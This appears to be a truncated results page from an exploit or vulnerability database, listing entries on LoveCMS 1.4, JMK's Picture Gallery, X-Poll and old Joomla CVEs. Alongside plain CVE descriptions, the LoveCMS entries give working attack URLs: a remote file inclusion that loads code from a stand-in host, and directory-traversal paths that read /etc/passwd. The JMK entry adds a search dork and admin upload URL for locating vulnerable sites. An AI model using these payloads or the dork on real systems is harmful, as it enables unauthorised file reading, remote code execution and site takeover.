107 matches found
lovecms14-multi.txt
rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd%00 /lovecms/?load=../../../../../../../../../../etc/passwd%00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tm...
LoveCMS 1.4 multiple vulnerabilities
rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd00 /lovecms/?load=../../../../../../../../../../etc/passwd00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tmp/...
CVE-2006-4476
Multiple unspecified vulnerabilities in Joomla! before 1.0.11, related to "Injection Flaws," allow attackers to have an unknown impact via 1 globals.php, which uses includeonce instead of require; 2 the $options variable; 3 Admin Upload Image; 4 -load; 5 content submissions when frontpage is...
CVE-2006-4471
The Admin Upload Image functionality in Joomla! before 1.0.11 allows remote authenticated users to upload files outside of the /images/stories/ directory via unspecified vectors...
CVE-2006-4471
CVE-2006-4471 : In Joomla! before 1.0.11, the Admin Upload Image feature allows remote authenticated users to upload files outside the /images/stories/ directory via unspecified vectors. Affected: Joomla! prior to 1.0.11. Root cause: insufficient enforcement of directory restrictions during image...
Design/Logic Flaw
X-Scripts X-Poll xpoll 2.30 allows remote attackers to execute arbitrary PHP code by using admin/images/add.php to upload a PHP file, then access it...
JMKpicture.txt
dork: "JMK's Picture Gallery" and last path to add : admingallery.php3?action=add&upload=1 example:hhtp://www.site.com/path/.../admingallery.php3?action=add&upload=1 credits:AlpEren,tugr@...